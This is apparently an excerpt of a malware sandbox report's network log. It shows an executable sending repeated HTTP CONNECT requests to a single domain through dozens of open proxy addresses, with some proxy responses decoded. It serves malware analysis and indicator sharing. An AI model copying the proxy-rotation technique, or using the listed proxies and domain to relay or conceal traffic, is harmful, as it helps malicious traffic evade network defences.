                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2078192.168.2.45430151.75.126.150366946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.231528044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2079192.168.2.455492193.239.56.8480816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.232050896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2080192.168.2.450724196.1.182.4680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.302999020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2081192.168.2.45546570.166.167.38577286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.303917885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2082192.168.2.45095243.153.52.22331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.314605951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.381429911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2083192.168.2.45549580.13.43.193806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.377161980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.381467104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2084192.168.2.45555265.1.244.23210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.378535032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.653623104 CET177INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:37 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.6.20-0+deb8u1
                                                                                                      Server: squid/6.0.0-20220501-re899e0c27
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2085192.168.2.455553103.78.0.4431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.416832924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2086192.168.2.455508211.43.214.205806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.432522058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.568861008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.568790913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.568674088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.584264994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:02.496974945 CET429INHTTP/1.1 400 Bad Request
                                                                                                      Date: Fri, 23 Feb 2024 08:46:02 GMT
                                                                                                      Server: cloudflare
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 253
                                                                                                      CF-RAY: -
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2087192.168.2.451248209.216.90.208524016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.440191031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.568903923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.568797112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.568666935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.584429979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.756160975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2088192.168.2.451013161.97.160.158139706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.442018986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.443988085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2089192.168.2.455526132.148.245.169361496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.442090034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2090192.168.2.451276162.0.220.222532426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.442207098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.568840027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.568782091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2091192.168.2.45134551.38.64.38498436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.442631006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2092192.168.2.455523167.99.219.17381186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.443418980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2093192.168.2.451349141.94.174.678566812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.444231033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2094192.168.2.45451446.107.230.12210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.444386005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.443990946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2095192.168.2.455112194.233.78.142390676812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.444390059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.504816055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.147144079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2096192.168.2.451121193.31.119.180558506812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.444876909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2097192.168.2.451409132.148.245.169498246812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.445055008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2098192.168.2.45131386.107.178.10231286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.445055962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.581185102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.646858931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.646910906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.646781921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.793605089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2099192.168.2.451155217.112.80.252806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.445077896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.603741884 CET882INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:37 GMT
                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                      Content-Length: 665
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6d 20 50 48 50 2f 37 2e 34 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at postmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2100192.168.2.451065178.33.167.180423626812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.445077896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.581357956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2101192.168.2.451348132.226.7.23302776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.445110083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2102192.168.2.451148200.41.170.211112016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.445458889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.319271088 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2103192.168.2.45553936.67.77.4131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.455317974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2104192.168.2.455183129.205.123.21410806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.463771105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2105192.168.2.451125203.202.252.14912006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.465792894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.568921089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2106192.168.2.451360185.118.153.11080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.474284887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.977516890 CET202INHTTP/1.0 403 Forbidden
                                                                                                      Content-Length: 819
                                                                                                      Content-Type: text/html
                                                                                                      Date: Fri, 23 Feb 2024 08:32:19 GMT
                                                                                                      Expires: Fri, 23 Feb 2024 08:32:19 GMT
                                                                                                      Server: Mikrotik HttpProxy
                                                                                                      Proxy-Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2107192.168.2.455519114.67.113.118451536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.474545956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.568928003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2108192.168.2.451358142.93.66.245259796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.486038923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.581187010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.646877050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.646825075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.646785021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.793643951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2109192.168.2.451198103.174.102.127806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.492100000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569025993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.568799973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
